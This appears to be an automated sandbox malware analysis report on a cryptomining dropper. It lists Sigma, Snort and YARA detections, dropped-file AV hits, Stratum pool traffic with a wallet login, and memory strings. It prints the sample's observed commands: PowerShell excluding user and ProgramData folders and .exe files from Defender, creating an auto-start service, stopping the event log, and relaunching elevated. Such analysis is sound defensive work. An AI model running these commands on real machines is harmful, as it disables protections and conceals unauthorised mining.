          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6520, ProcessName: powershell.exe
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 1036, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, ProcessId: 1836, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6520, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7144, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 972, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", ProcessId: 5388, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 1036, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, ProcessId: 1836, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 72, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1552, ProcessName: sc.exe

          Snort Signatures

          Timestamp:03/14/24-13:56:00.164561
          SID:2841335
          Source Port:59942
          Destination Port:22
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/14/24-13:56:02.320789
          SID:2841335
          Source Port:59948
          Destination Port:22
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/14/24-13:56:00.878567
          SID:2841335
          Source Port:59944
          Destination Port:22
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/14/24-13:56:01.594395
          SID:2841335
          Source Port:59946
          Destination Port:22
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeAvira: detection malicious, Label: TR/AD.Nekark.ziece
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeReversingLabs: Detection: 95%

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTR
          Detected Stratum mining protocol
          Source: global trafficTCP traffic: 192.168.2.16:49704 -> 44.196.193.227:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"86squ9t9d3pxzxftqg52h4kwdgkdjcdq2e2mzvdq4o173yaikjighkzdrbsl62iggeaeqpqx8uebbpkw6a3jkswleuwryin","pass":"dn120723340","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Found strings related to Crypto-Mining
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exeString found in binary or memory: cryptonight-monerov7
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorSYSTE source: svchost.exe, 00000057.00000002.2504659405.0000029D50218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1495352991.0000029D50213000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58318b source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: _prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2* source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb001\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000002.2581903644.0000029D50263000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831-B09 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809238DCE0 FindFirstFileExW,131_2_000002809238DCE0

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59942 -> 45.144.165.227:22
          Source: TrafficSnort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59944 -> 45.144.165.227:22
          Source: TrafficSnort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59946 -> 45.144.165.227:22
          Source: TrafficSnort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59948 -> 45.144.165.227:22
          Source: global trafficTCP traffic: 192.168.2.16:49704 -> 44.196.193.227:10128
          Source: Joe Sandbox ViewIP Address: 72.21.81.240 72.21.81.240
          Source: Joe Sandbox ViewIP Address: 44.196.193.227 44.196.193.227
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownDNS traffic detected: queries for: gulf.moneroocean.stream
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: lsass.exe, 00000031.00000000.1409136630.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2700477885.000001BA8E283000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 00000031.00000002.2736247539.000001BA8E3E1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409782436.000001BA8E3CB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E297000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
          Source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 00000002.00000002.1398746540.0000016359062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: lsass.exe, 00000031.00000002.2736247539.000001BA8E3E1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409782436.000001BA8E3CB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E297000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000031.00000000.1409136630.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2700477885.000001BA8E283000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiC
          Source: lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: lsass.exe, 00000031.00000000.1409136630.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2700477885.000001BA8E283000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
          Source: svchost.exe, 00000069.00000000.1576416010.000001B311C96000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.w
          Source: lsass.exe, 00000031.00000002.2659566774.000001BA8DA8B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000031.00000000.1409136630.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2700477885.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1619903394.000001F22BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1620429839.000001F22BA41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1622306834.000001F22BACB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: svchost.exe, 0000006F.00000000.1620180473.000001F22BA2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe.com749
          Source: svchost.exe, 0000006F.00000000.1621428719.000001F22BA8C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1623512155.000001F22C314000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
          Source: svchost.exe, 0000006F.00000000.1622306834.000001F22BACB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1621145967.000001F22BA7B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
          Source: svchost.exe, 0000006F.00000000.1621793217.000001F22BAA2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000003.1650296288.000001F22BAC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?3ff322c87bb41
          Source: svchost.exe, 0000006F.00000000.1620180473.000001F22BA2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cabD9749
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000031.00000000.1407435054.000001BA8DA4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2630628617.000001BA8DA4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: svchost.exe, 00000069.00000000.1575539204.000001B311C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000069.00000002.2509671154.000001B311C2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/iqmnfy5ub2wrt6itb67uu4wcci_1.3.36.372/GoogleUpdate
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
